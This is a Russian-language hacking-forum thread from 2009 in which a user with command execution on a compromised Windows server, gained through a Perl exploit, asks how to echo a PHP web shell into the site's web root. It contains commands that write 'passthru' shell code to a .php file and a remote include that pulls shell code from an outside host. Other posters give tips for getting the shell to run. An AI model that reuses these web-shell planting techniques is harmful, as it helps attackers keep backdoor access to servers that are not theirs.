Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   cmd???? (https://forum.antichat.xyz/showthread.php?t=104960)

fly 06.02.2009 16:13

cmd????
 
Вопрос такой!
Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой

так создается
echo test > "D:\Website\WWW\1.php"


если так вообще ничего не создается
echo <?php passthru $cmd?> > "D:\Website\WWW\1.php"

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"

т.е. на выходе получаю "<?php passthru $cmd?>"
Php на серваке есть!

Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?>

p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!!

gold-goblin 06.02.2009 16:18

как выйти именно из этой ситуации я хз..
Попробуй поднять фтп и передать шел =)

fly 06.02.2009 16:21

gold-goblin

Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win

Brain explosion 06.02.2009 16:22

нах тебе php-шелл, если у тебя уже cmd-шелл?

Pashkela 06.02.2009 16:26

Цитата:

fly

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"
edit D:\Website\WWW\1.php

geezer.code 06.02.2009 16:30

а чем кавычки мешают ? он и с ними будет нормально интерпретироваться.

fly 06.02.2009 16:35

to geezer.code

нет белый фон ""

а в исходники страницы "<?phpinfo();?>"

вообще не в тему Pashkela

Pashkela 06.02.2009 16:36

Цитата:

вообще не в тему Pashkela
почему? У меня работает

сначала залил, точно как ты, а потом edit и убираешь кавычки

fly 06.02.2009 16:40

)))это локально)) , а у меня через сплоит перловый!

geezer.code 06.02.2009 16:41

а ты сделай "<?php phpinfo();?>" обязательно - php
проверил локально, работает.

"<?phpinfo();?>" тоже выводит "" :)


Время: 09:36